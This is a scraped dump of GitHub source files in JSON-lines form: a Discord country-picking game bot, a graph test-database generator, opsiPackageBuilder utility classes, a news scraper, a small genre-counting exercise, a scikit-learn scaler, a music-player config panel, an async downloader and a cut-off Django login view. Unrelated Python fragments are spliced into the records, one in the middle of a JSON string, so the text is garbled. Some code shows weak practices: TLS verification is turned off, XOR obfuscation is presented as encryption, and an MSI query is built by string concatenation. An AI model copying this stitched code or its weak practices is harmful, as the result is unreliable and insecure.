+{"seq_id":"40126823454","text":"import sqlite3\nfrom sqliteHelper import *\nimport discord\n\ndef createGame(ctx):\n db = sqlite3.connect('data.db')\n cur = db.cursor()\n\n #Creating the game db\n cur.execute('''CREATE TABLE IF NOT EXISTS game(player text, playerId integer, country text, wood integer, wheat integer, oil integer)''')\n db.commit()\n db.close()\n\n\ndef joinGame(ctx):\n db = sqlite3.connect('data.db')\n cur = db.cursor()\n #check if the player is already logged in\n for id in cur.execute('SELECT playerId FROM game'):\n if checkValues(ctx.author.id, id):\n return False\n break \n else:\n # Add player at the game\n cur.execute('''INSERT INTO game VALUES(?,?,?,?,?,?)''', [str(ctx.author.name), str(ctx.author.id), \"\", 500, 500, 500])\n db.commit()\n return True\n\nclass ChoosingView(discord.ui.View):\n @discord.ui.select(\n placeholder = \"Escolha um país para jogar!\", \n min_values = 1, \n max_values = 1, \n options = [ \n discord.SelectOption(\n label=\"Império do Sertão\",\n description=\"Clique aqui para governar o Império da Sertão\"\n ),\n discord.SelectOption(\n label=\"Império do Amazonas\",\n description=\"Clique aqui para governar o Império da Amazonas\"\n ),\n discord.SelectOption(\n label=\"Império Farroupilha\",\n description=\"Clique aqui para governar o Império da Farroupilha\"\n ),\n discord.SelectOption(\n label=\"Império Sudestino\",\n description=\"Clique aqui para governar o Império da Sudestino\"\n ),\n discord.SelectOption(\n label=\"Império da Mata\",\n description=\"Clique aqui para governar o Império da Mata\"\n )\n ]\n\n )\n async def select_callback(self, select, interaction): # the function called when the user is done selecting options\n db = sqlite3.connect('data.db')\n cur = db.cursor()\n #Define the forbidden countrys characters\n forbidden_characters = \"'()[],\"\n # List of 
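# A linear-time alternative to findPairs in 532Python.py above (count unique
# pairs with absolute difference k). The original compares every index pair
# and deduplicates lists of pairs; a Counter does it in one pass:
from collections import Counter

def find_pairs(nums, k):
    counts = Counter(nums)
    if k == 0:
        return sum(1 for v in counts.values() if v > 1)  # duplicated values
    if k < 0:
        return 0
    return sum(1 for x in counts if x + k in counts)     # distinct values

assert find_pairs([3, 1, 4, 1, 5], 2) == 2               # (1,3) and (3,5)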
countrys that are already selected\n countrys_already_selected = []\n # Fill the countrys_already_selected list\n for countrys in cur.execute('''SELECT country FROM game'''):\n newCountryName = str(countrys)\n for i in range(0, len(forbidden_characters)):\n newCountryName = newCountryName.replace(forbidden_characters[i], \"\")\n\n countrys_already_selected.append(str(newCountryName))\n # Check if the selected country are already selected\n if str(select.values[0]) in countrys_already_selected:\n await interaction.response.send_message(f\"O país {select.values[0]} já foi selecionado. Selecione outro, por favor.\")\n else:\n cur.execute(f'''UPDATE game SET country=? WHERE playerId=?''', [str(select.values[0]), interaction.user.id])\n db.commit()\n await interaction.response.send_message(f\"O país {select.values[0]} foi selecionado. Aproveite a partida!\")\n","repo_name":"Fibertero/LandRulerDiscordBot","sub_path":"game_manage.py","file_name":"game_manage.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72580676394","text":"## create clique db with same nodes as connection type (n**3 connections)\nFILE_PATH = \"tests/dbs/distinct_db.txt\"\nNODES = 200\n\n\nnodes = [f'Q{i}' for i in range(NODES)]\n\nwith open(FILE_PATH, 'w', encoding='utf-8') as output:\n n = 0\n end_constants = NODES/10\n for node in nodes:\n if n < end_constants:\n output.write(f'{node} constant:10\\n')\n else:\n output.write(f'{node}\\n')\n n += 1\n for node1 in nodes:\n for node2 in nodes:\n for node3 in nodes:\n output.write(f'{node1}->{node2} :{node3}\\n')\n\n","repo_name":"barisione-biso/MillenniumDB","sub_path":"scripts/distinct/distinct_db.py","file_name":"distinct_db.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38938591099","text":"__author__ = 'Holger Pandel'\n__copyright__ = \"Copyright 2013-2015, Holger Pandel\"\n__license__ = \"MIT\"\n__maintainer__ = \"Holger Pandel\"\n__email__ = \"holger.pandel@googlemail.com\"\n__status__ = \"Production\"\n\nimport base64\nimport ctypes\nimport itertools\nimport logging\nimport platform\nimport socket\nimport sys\nimport os\nimport re\nimport string\nfrom itertools import cycle\n\nif sys.platform.lower().startswith('win'):\n import winreg\n from msilib import *\n\nfrom datetime import datetime\nfrom binascii import hexlify, unhexlify\nfrom pathlib import PurePath, PurePosixPath, WindowsPath\n\nfrom PyQt5 import QtCore\n\nimport oPB\n\ntranslate = QtCore.QCoreApplication.translate\n\nclass LogMixin(object):\n \"\"\"\n Log mixin class\n\n Inherit from this class to access app-wide logger via\n\n self.logger\n\n from own class\n \"\"\"\n\n @property\n def logger(self):\n #name = '.'.join([__name__, self.__class__.__name__])\n name = '.'.join([self.__module__, self.__class__.__name__])\n return logging.getLogger(name)\n\n\nclass Helper():\n \"\"\"\n Simple tool functions\n\n Every method is defined as ``@classmethod``\n \"\"\"\n\n @classmethod\n def extCheck(cls, filename: str) -> bool:\n \"\"\"File extension check:\n Valid extension: ins, opsiscript, opsiinc\n\n Helper.extCheck(filename)\n\n Alternatives\n 1) ext = m.rpartition('.')[-1]; if ext == ...\n 2) m.lower().endswith(('.png', '.jpg', '.jpeg')) ....\n\n :param filename: filename to check\n \"\"\"\n\n if filename == \"\": return True\n\n value = filename.lower() # change everything to lower case\n ext = 
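# English gloss of the select menu in game_manage.py above (labels are
# Portuguese): "Escolha um pais para jogar!" = "Choose a country to play!";
# "... ja foi selecionado. Selecione outro, por favor." = "... has already
# been selected. Please pick another."; "... foi selecionado. Aproveite a
# partida!" = "... selected. Enjoy the match!". Its duplicate check strips
# the characters "'()[]," from str(row); fetching the column directly avoids
# that string munging -- a sketch against the same schema:
import sqlite3

def taken_countries(db_path='data.db'):
    with sqlite3.connect(db_path) as db:
        rows = db.execute('SELECT country FROM game').fetchall()
    return {row[0] for row in rows if row[0]}  # each row is a 1-tuple

# membership test replaces the forbidden-characters cleanup:
# if selected_country in taken_countries(): ...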
value.rpartition('.')[-1] # extract file extension, rpartition returns 3-tuple: part before the separator, the separator itself, and the part after the separator\n return False if not ext in oPB.SCRIPT_EXT else True\n\n @classmethod\n def concat_path_native(cls, path: str, file: str) -> str:\n \"\"\"\n Help function for connecting paths and filenames/foldernames.\n Takes underlying os into account.\n\n :param path: base path\n :param file: file or folder\n \"\"\"\n if platform.system() == \"Windows\": # if path is a ONLY windows drive, add a backslash to the drive letter\n if path[-1:] == \":\":\n path = path + \"\\\\\"\n value = str(PurePath(path, file))\n return value\n\n @classmethod\n def concat_path_posix(cls, path: str, file: str) -> str:\n \"\"\"\n Help function for connecting paths and filenames/foldernames.\n Only POSIX-complient paths.\n\n :param path: base path\n :param file: file or folder\n \"\"\"\n\n return str(PurePosixPath(path, file))\n\n @classmethod\n def get_file_from_path(cls, complete: str) -> str:\n \"\"\"\n Return file name from complete path as string\n\n :param complete: path incl. filename\n :return: filename\n \"\"\"\n\n return str(PurePath(complete).name)\n\n @classmethod\n def parse_text(cls, text: str) -> str:\n \"\"\"\n Replace individual @TABS and @ (cr+lf) templates within ``text``\n\n with HTML-based replacement (for QMessageBox messages)\n\n @TAB -> \"    \"\n @ -> \"
\"\n\n :param text: text with templates\n :return: display text\n \"\"\"\n\n text = text.replace(\"@TAB\", \"    \")\n text = text.replace(\"@\", \"
\")\n return text\n\n @classmethod\n def str_to_bool(cls, s: str) -> bool:\n \"\"\"\n Convert string to bool\n\n :param s: \"true\" / \"false\" as string\n :return: boolean expression\n \"\"\"\n\n print(\"str_to_bool called with value: \" + s)\n if s.upper() == 'TRUE':\n return True\n elif s.upper() == 'FALSE':\n return False\n else:\n raise ValueError(\"Cannot covert {} to a bool\".format(s))\n\n @classmethod\n def get_user(cls) -> str:\n \"\"\"Return current username, if found\"\"\"\n\n for name in ('LOGNAME', 'USER', 'LNAME', 'USERNAME'):\n user = os.environ.get(name)\n if user:\n return user\n # If not user from os.environ.get(), works only on UNIX\n #import pwd\n #return pwd.getpwuid(os.getuid())[0]\n\n @classmethod\n def encrypt(cls, text: str) -> str:\n \"\"\"\n Wrapper for Hexlify obfuscator\n\n Uses Helper.get_user() to obtain *cipher* key\n\n :param text: string to obfuscate\n :return: obfuscated string\n \"\"\"\n\n encrypted = (\n hexlify(\n Helper.Cipher.XORencrypt(Helper.get_user(), text)\n )\n )\n return encrypted.decode('utf-8')\n\n\n @classmethod\n def decrypt(cls, text: str) -> str:\n \"\"\"\n Wrapper for Hexlify obfuscator\n\n Uses Helper.get_user() to obtain *cipher* key\n\n :param text: obfuscated string\n :return: not obfuscated string\n \"\"\"\n\n decrypted = (\n Helper.Cipher.XORdecrypt(\n Helper.get_user(), unhexlify(text)\n )\n )\n return decrypted\n\n class Cipher:\n \"\"\"Cipher (wrapper) class\"\"\"\n\n @classmethod\n def XORencrypt(cls, key, plaintext):\n cyphered = ''.join(chr(ord(c) ^ ord(k)) for c, k in zip(plaintext, cycle(key)))\n return base64.b64encode(cyphered.encode())\n\n @classmethod\n def XORdecrypt(cls, key, ciphertext):\n message = ''.join(chr(c ^ ord(k)) for c, k in zip(base64.b64decode(ciphertext), cycle(key)))\n return message\n\n @classmethod\n def timestamp(cls) -> str:\n \"\"\"\n Small timestamp\n\n :return: timestamp string \"%Y%m%d-%H%M%S\"\n \"\"\"\n\n return datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n\n @classmethod\n def timestamp_changelog(cls) -> str:\n \"\"\"\n Long changelog timestamp\n\n :return: Mon, 27 Apr 2015 12:33:04 + 0100\n \"\"\"\n\n return datetime.now().strftime(\"%a, %d %b %Y %H:%M:%S +0000\")\n\n @classmethod\n def paramlist2list(cls, value) ->list:\n \"\"\"\n Converts comma-separated ``value``, to correct list format\n and takes into account, that the ``value`` itself could contain commas, but\n enclosed within \"...\", i. e.:\n\n \"OU=test1,dc=subdomain,dc=domain,dc=de\", \"OU=test2,dc=subdomain,dc=domain,dc=de\"\n -> these are two values, with commas inside the separate values\n\n Convert to rea list:\n [\"\\\"OU=Member Computers,dc=subdomain,dc=domain,dc=de\\\"\", \"\\\"OU=Member Computers2,dc=subdomain,dc=domain,dc=de\\\"\"]\n\n :param value: pseudo-list as string\n :return: correctly separated parameters as real list\n \"\"\"\n\n quot = 0\n quotpos = []\n retval = []\n sep = \"++@KOM@++\"\n\n # find all positions of , WITHIN \"...\", incl. \" char!\n\n for i in range(0, len(value) - 1, 1):\n if value[i] == chr(34):\n quot = 1 - quot # find opening/closing double quotes\n if (value[i] == chr(44)) and (quot == 0):\n quotpos.append(i) # find comma between quoted strings; i.e. 
quotpos=[0,4,12,56]\n\n # now separate string into list, exchange every comma OUTSIDE of \"...\" with ++@KOM@++\n # re-join the string and split it along the new separator, voilà!\n\n if len(quotpos) > 0:\n list_ = list(value)\n for pos in quotpos:\n list_[pos] = sep\n\n val = \"\".join(list_)\n\n retval = [x.strip() for x in val.split(sep)]\n\n return retval\n else:\n retval.append(value)\n return retval\n\n @classmethod\n def get_available_drive_letters(cls) -> list:\n \"\"\"\n Returns every non-mapped drive letter\n\n .. see: http://stackoverflow.com/questions/4188326/in-python-how-do-i-check-if-a-drive-exists-w-o-throwing-an-error-for-removable\n\n :return: list\n \"\"\"\n\n if 'Windows' not in platform.system():\n return []\n drive_bitmask = ctypes.cdll.kernel32.GetLogicalDrives()\n share_bitmask = sum([2**(ord(x)-65) for x in cls.get_persistent_netshare_drive_letters()])\n drive_bitmask |= share_bitmask\n return list(itertools.compress(string.ascii_uppercase,\n map(lambda x:x=='0', bin(drive_bitmask+2**26)[:1:-1])))\n\n @classmethod\n def get_existing_drive_letters(cls) -> list:\n \"\"\"\n Returns every mapped drive letter\n\n .. see: http://stackoverflow.com/questions/4188326/in-python-how-do-i-check-if-a-drive-exists-w-o-throwing-an-error-for-removable\n\n :return: list\n \"\"\"\n\n if 'Windows' not in platform.system():\n return []\n drive_bitmask = ctypes.cdll.kernel32.GetLogicalDrives()\n share_bitmask = sum([2**(ord(x)-65) for x in cls.get_netconnection_drive_letters()])\n drive_bitmask |= share_bitmask\n return list(itertools.compress(string.ascii_uppercase,\n map(lambda x:x=='1', bin(drive_bitmask+2**26)[:1:-1])))\n\n @classmethod\n def get_persistent_netshare_drive_letters(cls) -> list:\n \"\"\"\n Return every persistent netshare driver letter -> includes disconnected ones\n\n :return: list\n \"\"\"\n if 'Windows' not in platform.system():\n return []\n import winreg\n try: # key Network must not exists\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, \"Network\") as key:\n info = winreg.QueryInfoKey(key)\n return [winreg.EnumKey(key, i).upper() for i in range(info[0])]\n except:\n return []\n\n @classmethod\n def get_netconnection_drive_letters(cls) -> list:\n \"\"\"\n Return every remembered netshare driver letter -> includes disconnected ones\n\n :return: list\n \"\"\"\n WNetOpenEnum = ctypes.cdll.MPR.WNetOpenEnumA # https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/nf-winnetwk-wnetopenenuma\n WNetCloseEnum = ctypes.cdll.MPR.WNetCloseEnum # https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/nf-winnetwk-wnetcloseenum\n WNetEnumResource = ctypes.cdll.MPR.WNetEnumResourceA # https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/nf-winnetwk-wnetenumresourcea\n RESOURCE_SCOPE_REMEMBERED = 3\n RESOURCE_TYPE_DISK = 1\n RESOURCE_USAGE_IGNORED = 0\n lpNetResource = None\n ptrHandle = ctypes.wintypes.HANDLE()\n\n class NETRESOURCEA(ctypes.Structure):\n #https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/ns-winnetwk-netresourcea\n _fields_ = [\n (\"dwScope\", ctypes.wintypes.DWORD),\n (\"dwType\", ctypes.wintypes.DWORD),\n (\"dwDisplayType\", ctypes.wintypes.DWORD),\n (\"dwUsage\", ctypes.wintypes.DWORD),\n (\"lpLocalName\", ctypes.wintypes.LPSTR),\n (\"lpRemoteName\", ctypes.wintypes.LPSTR),\n (\"lpComment\", ctypes.wintypes.LPSTR),\n (\"lpProvider\", ctypes.wintypes.LPSTR)\n ]\n\n remembered_net_drives = []\n iRet = WNetOpenEnum(RESOURCE_SCOPE_REMEMBERED, RESOURCE_TYPE_DISK, RESOURCE_USAGE_IGNORED, lpNetResource, ctypes.byref(ptrHandle))\n # iRet 
(all Methods): https://docs.microsoft.com/en-us/windows/win32/debug/system-error-codes\n if (iRet == 0):\n entries = ctypes.c_int(-1)\n buffer = ctypes.c_int(16384) # 2048\n ptrBuffer = ctypes.create_string_buffer(buffer.value)\n\n iRet = WNetEnumResource(ptrHandle, ctypes.byref(entries), ptrBuffer, ctypes.byref(buffer))\n while ((iRet == 0) or (entries.value > 0)):\n ptr = ctypes.addressof(ptrBuffer)\n for i in range(entries.value):\n x = NETRESOURCEA.from_address(ptr)\n remembered_net_drives += x.lpLocalName.decode(\"ascii\")\n ptr += ctypes.sizeof(x)\n\n entries.value = -1\n buffer.value = 16384\n iRet = WNetEnumResource(ptrHandle, ctypes.byref(entries), ptrBuffer, ctypes.byref(buffer))\n\n iRet = WNetCloseEnum(ptrHandle)\n if (iRet != 0):\n pass\n return [x.upper() for x in remembered_net_drives[::2]]\n\n @classmethod\n def test_port(cls, host: str, port: str, timeout: int = 2):\n \"\"\"\n Test if network port is reachable\n\n :param host: hostname or ip\n :param port: port number\n :param timeout: connection timeout\n :return: True or error\n \"\"\"\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(timeout)\n sock.connect((host, int(port)))\n sock.shutdown(socket.SHUT_RDWR)\n except OSError as e:\n return e\n else:\n sock.close()\n return True\n\n @classmethod\n def strip_ansi_codes(cls, s: str) -> str:\n \"\"\"\n Remove as many ANSI color and control codes from ``s`` as possible\n\n :param s: raw input string\n :return: cleaned string\n \"\"\"\n\n def removebackspaces(text):\n \"\"\"\n Removes backspaces from ``text``\n\n :param text:\n :return: cleaned string\n \"\"\"\n\n backspace_or_eol = r'(.\\010)|(\\033\\[K)'\n n = 1\n while n > 0:\n text, n = re.subn(backspace_or_eol, '', text, 1)\n return text\n\n s = s.replace(r'\\x1b', '\\n' + r'\\x1b')\n s = re.sub(r'\\x1b\\[\\d*;\\d*;\\d*m', '', s)\n s = re.sub(r'\\x1b\\[\\d*;\\d*[fmHr]', '', s)\n s = re.sub(r'\\x1b\\[\\d*[tGEFDBCAPMnXJKjam@Ldkel]', '', s)\n s = re.sub(r'\\x1b\\[\\?\\d*[hl]', '', s)\n s = re.sub(r'\\x1b\\[\\?\\w*', '', s)\n s = re.sub(r'\\x1b\\[>\\d*[hl]', '', s)\n s = re.sub(r'\\x1b\\[[Hsu]', '', s)\n s = re.sub(r'\\x1b\\(\\w*', '', s)\n s = re.sub(r'\\x1b\\]0;[\\w*]', '', s)\n s = re.sub(r'\\x1b[=>]', '', s)\n s = re.sub('(\\n)+', '\\n', s)\n s = re.sub('\\A\\n|\\n\\Z', '', s)\n s = re.sub(r'\\A\\v|\\v\\Z', '', re.sub(r'(\\v)+', '\\n', s))\n s = s.replace('\\07', '')\n # if I missed something, then get rid of it hopefully now\n ansi_escape1 = re.compile(r'(\\x9B|\\x1B\\[)[0-?]*[ -\\/]*[@-~]')\n s = ansi_escape1.sub('', s)\n ansi_escape2 = re.compile(r'\\x1b(\\[.*?[@-~]|\\].*?(\\x07|\\x1b\\\\))')\n s = ansi_escape2.sub('', s)\n s = removebackspaces(s)\n\n return s\n #s = re.sub(r'\\x1b\\[([0-9,A-Z]{1,2})?(;[0-9]{1,2})?(;[0-9]{1,3})?[m|l|H|K]?', '', s)\n #s = re.sub(r'\\x1b\\[(>\\?)([0-9,A-Z]{1,2})?(;[0-9]{1,2})?(;[0-9]{1,3})?[m|l|H|K|S|u]?', '', s)\n #return s\n\n #subdirs = get_subdirlist(r'\\\\file01.acme.local\\home$')\n @classmethod\n def get_subdirlist(cls, path: str):\n \"\"\"\n Return list of subdirectories\n\n :param path: base pathname as r'string'\n :return: list of subdirectories\n \"\"\"\n wpath = WindowsPath(path)\n return [f.name for f in wpath.iterdir() if f.is_dir()]\n\n # WINDOWS ONLY\n if sys.platform.lower().startswith('win'):\n @classmethod\n def regkey_value(cls, path, name=\"\", start_key = None):\n \"\"\"\n Query windows registry value\n\n .. 
see: http://code.activestate.com/recipes/578689-get-a-value-un-windows-registry/\n\n :Example:\n\n bios_vendor = regkey_value(r\"HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\BIOS\", \"BIOSVendor\")\n\n :param path: registry path\n :param name: value name (\"\" for default)\n :param start_key: start key\n :return: key value\n \"\"\"\n\n if isinstance(path, str):\n path = path.split(\"\\\\\")\n if start_key is None:\n start_key = getattr(winreg, path[0])\n return Helper.regkey_value(path[1:], name, start_key)\n else:\n subkey = path.pop(0)\n with winreg.OpenKey(start_key, subkey) as handle:\n assert handle\n if path:\n return Helper.regkey_value(path, name, handle)\n else:\n desc, i = None, 0\n while not desc or desc[0] != name:\n desc = winreg.EnumValue(handle, i)\n i += 1\n return desc[1]\n\n @classmethod\n def get_msi_property(cls, path: str, property=\"ProductCode\"):\n \"\"\"\n Return the MSI property for a given MSI package file\n Standard: return ProductCode\n\n :param path: full path of MSI file\n :return: MSI ProductCode String\n \"\"\"\n\n db = OpenDatabase(path, MSIDBOPEN_READONLY)\n view = db.OpenView (\"SELECT Value FROM Property WHERE Property='\" + property + \"'\")\n view.Execute(None)\n result = view.Fetch()\n\n return result.GetString(1)\n\n\n","repo_name":"pandel/opsiPackageBuilder","sub_path":"oPB/core/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":17089,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"70747405992","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport datetime\r\n\r\n\r\nclass Articolo:\r\n \"\"\"Articolo con titolo, data, descrizione, immagine e link.\"\"\"\r\n\r\n def __init__(\r\n self, titolo: str, data: str, descrizione: str, immagine: str, link: str\r\n ) -> None:\r\n self.titolo = titolo\r\n self.data = datetime.datetime.fromisoformat(data)\r\n self.descrizione = descrizione\r\n self.immagine = immagine\r\n self.link = link\r\n\r\n def __str__(self) -> str:\r\n return f'''Titolo: {self.titolo}\r\n Descrizione: {self.descrizione}\r\n Data: {self.data.date()}\r\n Immagine: {self.immagine}\r\n Link: {self.link}'''\r\n\r\n\r\ndef get_articoli() -> list[Articolo]:\r\n \"\"\"Restituisce la lista degli articoli presenti sul sito di RomaTre, dal più recente al più vecchio.\"\"\"\r\n\r\n # Scarica il sito\r\n result = requests.get(\r\n \"https://ingegneria.uniroma3.it/it/archivi/channel/in-evidenza-14/\",\r\n verify=False,\r\n )\r\n\r\n # Beautifulsuppa il sito\r\n soup = BeautifulSoup(result.content, features=\"html.parser\")\r\n\r\n # Inizializza lista di articoli\r\n articoli = []\r\n\r\n # Aggiunge articoli alla lista\r\n for articolo in soup.find_all(\"article\"):\r\n link = articolo.header.h2.a.attrs[\"href\"]\r\n titolo = articolo.header.h2.a.text\r\n immagine = articolo.div.figure.a.img.attrs[\"src\"]\r\n descrizione = articolo.find_all(\"div\")[1].find_all(\"div\")[1].text\r\n data = articolo.footer.span.time.attrs[\"datetime\"]\r\n\r\n articoli.append(Articolo(titolo, data, descrizione, immagine, link))\r\n\r\n return articoli\r\n","repo_name":"BuonHobo/sitarello","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73358883432","text":"\nuser_songs_1 = {\n \"David\": [\"song1\", \"song2\", \"song3\", \"song4\", \"song8\"],\n \"Emma\": [\"song5\", \"song6\", \"song7\"]\n}\n\nsong_genres_1 = {\n 
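# Round-trip sketch for the XOR/base64 obfuscation pair in tools.py above
# (Helper.encrypt hexlifies an XOR-with-username stream; decrypt reverses
# it). A standalone version of the same scheme; note that characters whose
# XOR exceeds 0x7F do not round-trip, because encryption UTF-8-encodes code
# points while decryption XORs raw bytes -- the same asymmetry exists in
# Helper.Cipher:
import base64
from binascii import hexlify, unhexlify
from itertools import cycle

def xor_encrypt(key, plaintext):
    mixed = ''.join(chr(ord(c) ^ ord(k)) for c, k in zip(plaintext, cycle(key)))
    return hexlify(base64.b64encode(mixed.encode())).decode('utf-8')

def xor_decrypt(key, token):
    raw = base64.b64decode(unhexlify(token))
    return ''.join(chr(c ^ ord(k)) for c, k in zip(raw, cycle(key)))

assert xor_decrypt('user', xor_encrypt('user', 'secret')) == 'secret'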
\"Rock\": [\"song1\", \"song3\"],\n \"Dubstep\": [\"song7\"],\n \"Techno\": [\"song2\", \"song4\"],\n \"Pop\": [\"song5\", \"song6\"],\n \"Jazz\": [\"song8\", \"song9\"]\n}\noutput_1 = {\n \"David\": [\"Rock\", \"Techno\"],\n \"Emma\": [\"Pop\"]\n}\ndef favogenere(user_songs_1,song_genres_1):\n res = {}\n for key in user_songs_1:\n res[key] = []\n\n for key, value in user_songs_1.items():\n #print('1------', key, value)\n d = {}\n for each in value:\n k = findKey(each)\n if k not in d:\n d[k] = 1\n else:\n d[k] += 1\n #print('d ---', d)\n max1 = max(d.values())\n #print('max: ',max1)\n for q,w in d.items():\n if w == max1:\n res[key].append(q)\n # print('d:---', d)\n # print('max---',max(d, key = d.get))\n return res\n\ndef findKey(string):\n for key in song_genres_1:\n for each in song_genres_1[key]:\n if each == string:\n return key\n\nprint(favogenere(user_songs_1,song_genres_1))\n\n\n\n# def favGenere(user_songs, song_genere):\n# d = {}\n# for key, value in user_songs.items():\n# for each in value:\n# for gen in song_genere:\n# if each in song_genere[gen]:\n# del user_songs[key][user_songs[key].index(each)]\n# user_songs[key].append(gen)\n \n# return user_songs\n\n#print(favGenere(user_songs_1, song_genres_1))\n\n\n","repo_name":"Ashi-s/coding_problems","sub_path":"DevPost/DevPost_favouriateGenere.py","file_name":"DevPost_favouriateGenere.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1823004153","text":"import numpy as np\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import StandardScaler\n\n\nclass ThresholdStandardScaler(BaseEstimator, TransformerMixin):\n\n \"\"\"\n like sklearn.preprocssing.StandardScaler, but thresholds the possible\n values to within a provided range, in order to be less sensitive to\n outliers\n \"\"\"\n\n def __init__(self,\n lower_threshold=-3,\n upper_threshold=3,\n *args,\n **kwargs):\n self.lower_threshold = lower_threshold\n self.upper_threshold = upper_threshold\n assert self.upper_threshold > self.lower_threshold\n self.trn = StandardScaler(*args, **kwargs)\n\n def fit(self, X, y=None):\n self.trn.fit(X)\n return self\n\n def transform(self, X):\n res = self.trn.transform(X)\n return np.clip(res, self.lower_threshold, self.upper_threshold)\n","repo_name":"diogo149/du","sub_path":"du/preprocessing/threshold_standard_scaler.py","file_name":"threshold_standard_scaler.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73116525992","text":"#-*- coding: utf-8 -*-\n'''\nCreated on 3 сент. 
2010\n\n@author: ivan\n'''\nfrom foobnix.preferences.config_plugin import ConfigPlugin\nfrom gi.repository import Gtk\nfrom foobnix.fc.fc import FC\nfrom foobnix.helpers.dialog_entry import info_dialog_with_link_and_donate\nclass NotificationConfig(ConfigPlugin):\n\n name = _(\"Notifications\")\n\n def __init__(self, controls):\n box = Gtk.Box.new(Gtk.Orientation.VERTICAL, 0)\n box.hide()\n\n self.check_new_version = Gtk.CheckButton.new_with_label(_(\"Check for new foobnix release on start\"))\n self.check_new_version.show()\n\n demo = Gtk.Button.new_with_label(_(\"Show new foobnix release available demo dialog\"))\n demo.connect(\"clicked\", lambda * a:info_dialog_with_link_and_donate(\"foobnix [version]\"))\n demo.show()\n\n\n box.pack_start(self.check_new_version, False, True, 0)\n box.pack_start(demo, False, False, 0)\n\n self.widget = box\n\n def on_load(self):\n self.check_new_version.set_active(FC().check_new_version)\n\n def on_save(self):\n FC().check_new_version = self.check_new_version.get_active()\n\n\n\n\n","repo_name":"foobnix/foobnix","sub_path":"foobnix/preferences/configs/notification_conf.py","file_name":"notification_conf.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"72"}
{"seq_id":"34053798756","text":"# -*- coding: utf-8 -*-\n\nimport functools\nimport asyncio\n\nfrom .request import get_content_length, request_range\nfrom .models import File, Shower\nfrom .utils import make_headers\nfrom .color import color_str\n\n\nasync def download(args):\n file_obj = File(args.out)\n\n method = args.method\n url = args.url\n headers = make_headers(args)\n data = args.data\n timeout = args.timeout\n chuck_size = args.chuck_size\n concurrency = args.concurrency\n\n content_length = await get_content_length(method, url, headers=headers, data=data, timeout=timeout)\n\n if file_obj.is_init():\n file_obj.record_data(content_length)\n else:\n if file_obj.info.content_length != content_length:\n print(color_str(\"Conflict content length:\", codes=(1, 91)), file_obj.info.content_length, content_length)\n return None\n\n file_obj.info.content_length = content_length\n file_obj.create_file()\n\n shower = Shower(args.out, content_length, file_obj.info.completed_size, concurrency, chuck_size)\n\n show_task = asyncio.ensure_future(shower.show())\n\n ctrl_queue = asyncio.queues.Queue(maxsize=concurrency)\n\n part = 1\n for begin_point, end_point in file_obj.undownload_chucks:\n # chunk point\n # point is the beginning of the chunk\n # point_t is the end of the chunk\n point = begin_point\n point_t = 0\n while point <= end_point:\n await ctrl_queue.put(None)\n point_t = min(point + chuck_size, end_point)\n\n task = asyncio.ensure_future(\n request_range(method, url, point, point_t, ctrl_queue, headers=headers, data=data, timeout=timeout)\n )\n\n task.add_done_callback(functools.partial(save_data, file_obj, point, point_t, shower, part))\n\n if point == point_t:\n break\n\n point = min(point_t + 1, end_point)\n part += 1\n\n while ctrl_queue.qsize():\n await asyncio.sleep(1)\n\n await asyncio.sleep(1)\n file_obj.close()\n file_obj.info.remove_aget()\n shower.over()\n show_task.cancel()\n\n\ndef save_data(file_obj, begin_point, end_point, shower, part, fut):\n data = fut.result()\n\n file_obj.write(data, begin_point)\n file_obj.record_data(begin_point, end_point)\n\n shower.append_info(part, begin_point, 
end_point)\n","repo_name":"PeterDing/aget","sub_path":"aget/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"72"} +{"seq_id":"8222457663","text":"from django.shortcuts import render\n\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import login as django_login\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom users.models import Person\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth import logout as django_logout\nfrom urllib.parse import quote, unquote\nimport os\nimport requests\n\n\ndef landing_page(request):\n \"\"\" View for the landing page.\n Args:\n request: Request object.\n Returns:\n HttpResponse: Rendered landing page.\n \"\"\"\n return render(request, 'landing_page/landing.html', {})\n\ntoken_to_info_url = 'https://app.roqs.basf.net/auth/token2info'\nbasf_login = \"https://app.roqs.basf.net/auth/login.html\"\nredirect_uri = \"https%3A%2F%2Fapp-dev.roqs.basf.net%2Fprai_information_desk%2Fafter_login\"\n\ndef login_view(request):\n \"\"\" Method to redirect user to the BASF federation login.\n The redirect_uri is passed as get_request parameter and refers to the route that corresponds to after_login.\n Args:\n request: Request object.\n Returns:\n HttpResponse: Redirect to BASF login or Bad Request message.\n \"\"\"\n try:\n #user = Person.objects.filter(username__iexact=\"gerstem5\")#Bypass basf auth\n #django_login(request, user[0])\n #return HttpResponseRedirect(request.GET[\"next\"])\n\n next = 